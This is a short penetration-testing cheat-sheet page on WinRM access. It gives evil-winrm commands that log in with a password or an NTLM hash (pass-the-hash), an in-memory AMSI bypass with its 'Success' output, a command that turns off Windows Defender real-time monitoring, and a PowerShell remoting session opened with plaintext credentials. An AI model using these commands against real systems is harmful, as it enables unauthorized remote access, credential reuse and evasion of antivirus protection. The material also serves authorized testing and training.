WinRM (5985,5986)

Authentication

evil-winrm -i <ip> -u <user> -p <pass>

evil-winrm -i <ip> -u <user> -H <hash>

# -S -> SSL
evil-winrm -i 10.10.11.152 -S -k <key> -c <crt>

AMSI Bypass

> #amsiscanbuffer
At line:1 char:1
+ #amsiscanbuffer
+ ~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.

# Try this as well
> set-mppreference —disablerealtimemonitoring $true

Try AMSI.fail.

> Bypass-4MSI

Info: Patching 4MSI, please be patient...
[+] Success!

> #amsiscanbuffer

PowerShell Remoting

PowerShell Remoting by default uses WinRM for Cmdlets such as Enter-PSSession. Therefore, a user needs to be in the local group Remote Management Users to be a valid user for these Cmdlets. However, instead of WinRM, SSH can also be used for PowerShell remoting.

Creating a PowerShell remoting session via WinRM in a bind shell can cause unexpected behavior. Opt for evil-winrm instead.

> $password = ConvertTo-SecureString "qwertqwertqwert123!!" -AsPlainText -Force

> $cred = New-Object System.Management.Automation.PSCredential("daveadmin", $password)

> Enter-PSSession -ComputerName CLIENTWK220 -Credential $cred
[CLIENTWK220]: PS C:\Users\daveadmin\Documents> whoami
whoami
clientwk220\daveadmin

PreviousRDP (3389)NextShares

Last updated 17 days ago

Was this helpful?